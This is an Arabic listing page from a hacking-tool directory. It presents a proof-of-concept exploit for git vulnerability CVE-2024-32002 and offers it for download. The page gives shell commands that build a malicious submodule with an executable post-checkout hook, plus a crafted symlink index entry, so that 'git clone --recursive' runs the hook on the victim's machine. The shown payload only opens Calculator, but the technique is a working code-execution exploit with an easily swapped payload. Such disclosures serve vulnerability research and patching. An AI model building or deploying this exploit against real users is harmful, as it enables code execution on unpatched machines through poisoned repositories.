Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32002 — إثبات مفهوم لثغرة git CVE-2024-32002 | Kitploit
أدوات/GitHubGitHub/markuta/cve-2024-32002
تحليل الثغرات الأمنيةالاستغلالأمن سلسلة التوريدالتعلم والتعليمتطوير الحمولات
GitHubmarkuta/cve-2024-32002

CVE-2024-32002

إثبات مفهوم لثغرة git CVE-2024-32002

عرض المستودع
21منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-32002

مثال بسيط لإثبات المفهوم يقوم بتشغيل تطبيق Calculator (مثال لنظام macOS فقط). عند استخدام أمر git clone --recursive، سيقوم هذا المستودع أيضًا بسحب https://github.com/markuta/hooky، الذي يحتوي على سكربت post-checkout. يعتمد بشكل أساسي على ملف إصلاح الالتزام t7406-submodule-update.sh.

التشغيل

ملاحظة: الإصدارات الأقدم من 2.45.1 و2.44.1 و2.43.4 و2.42.2 و2.41.1 و2.40.2 و2.39.4 معرضة للخطر.

root@kitploit:~
git clone --recursive github.com/markuta/CVE-2024-32002

إنشاء مستودعاتك الخاصة

root@kitploit:~
# Submodule repo (payload)
git init hooky
cd hooky
mkdir -p y/hooks 
echo "open -a Calculator.app" > y/hooks/post-checkout
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m post-checkout
hook_repo_path="$(pwd)"

# Main repo
git init captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m add-submodule
printf .git >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m add-symlink

مزيد من المعلومات

يمكن العثور على مزيد من المعلومات حول الثغرة هنا وهنا.

تنزيل الأداة